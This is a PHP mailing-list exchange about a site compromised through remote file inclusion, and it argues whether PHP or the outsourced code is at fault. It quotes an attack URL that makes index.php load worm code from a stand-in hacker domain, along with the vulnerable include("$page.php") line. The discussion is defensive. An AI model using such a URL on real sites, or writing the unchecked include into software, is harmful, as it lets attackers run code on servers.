Stut wrote: > Seak, Teng-Fong wrote: >> But after I've spent some time reading the log files, I've finally >> found out how the hackers managed to achieve worm infiltration. >> >> Actually, they're using an URL like this: >> http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt? >> >> >> And the some-worm-file.txt file contains some PHP code, while my >> index.php contains this instruction: >> include("$page.php"); >> >> This is enough to make infiltration possible! IMO, this instruction >> is supposed to be used like this, isn't it? So this is obviously a PHP >> security loophole and I don't see how the "poorly written scripts" can >> help anything unless a totally rewrite! And there's no "poor server >> security" that I can see. > > You mean to say that you're not validating what you're getting from > the user? Frankly you deserve everything you get. No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. I had already spent a lot of time to learn and understand PHP, which normally isn't a part of my job. So, I had already done more than I should. > This is *not* a "security loophole", it *is* a poorly written script. Well, when something doesn't produce the expected effect/result, or produce a side-effect, it's considered as a bug. If that's not a bug, why would the behaviour be changed from PHP4 to PHP5 then? >> I've installed PHP5 and the problem seems fixed. However, PHP >> writes out where the problem occurs! Indeed, the hacker could read a >> line like this: >> Warning: include() [function.include]: URL file-access is disabled in >> the server configuration in >> C:\Inetpub\wwwroot\index.php on line X >> >> I don't want them (the hackers) to be able to read this either. >> That gives too much information about my server's file system. How can >> I stop that? > > Read the manual, specifically the error_reporting part. You can turn > the display of these messages off. I had. Well, I had tried to do so, spending time out of my tightly scheduled job planning. >> By the way, I know there're still a lot of servers out there still >> using PHP4. Is this vulnerability a known bug? At least, I'm not aware >> of that before! > > It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+) > introduces the ability to turn off the ability to prevent this issue, > but it's still badly written code. Stop blaming the tool, start > blaming the mirror image and start learning how to code defensively. > > -Stut > ---------- * Zoner PhotoStudio 8 - Your Photos perfect, shared, organised! www.zoner.com/zps You can download your free version. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
